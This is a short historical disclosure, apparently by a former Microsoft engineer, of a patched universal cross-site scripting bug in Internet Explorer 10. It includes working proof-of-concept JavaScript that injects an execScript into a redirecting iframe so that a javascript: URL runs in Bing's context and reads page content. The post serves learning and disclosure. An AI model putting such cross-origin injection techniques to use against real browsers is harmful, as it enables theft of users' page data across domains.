A simple UXSS using an iFrame that redirects to another domain: before the redirect completes, the parent injects an execScript into the iFrame that sets the iFrame’s own location to a javascript: URL. That URL executes in the context of the destination domain after the redirect finishes.
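function main() {
    // Create an iframe whose source redirects to another domain.
    document.getElementById("myDiv").innerHTML = '<iframe src="redirect.aspx" width="600" height="200"></iframe>';
    // Before the redirect completes, inject a script into the iframe (window[0]).
    // Its alert blocks until the user clicks OK; the iframe then sets its own location (w[0], with w = parent).
    window[0].execScript('w = parent;alert("Wait until Bing loads and click OK");w[0].location = \'javascript:alert(document.URL + document.body.innerText)\'');
}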
The alert inside the injected execScript pauses the iFrame’s thread, giving Bing time to load in the background. When the user dismisses the alert, the location assignment fires and the javascript: URL runs in Bing’s context. Note that this did not reproduce on the IE11 20130227-2100 build at the time because document.all and instant execScript had other issues — but it worked reliably on IE10. Tested on Win8 IE10.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.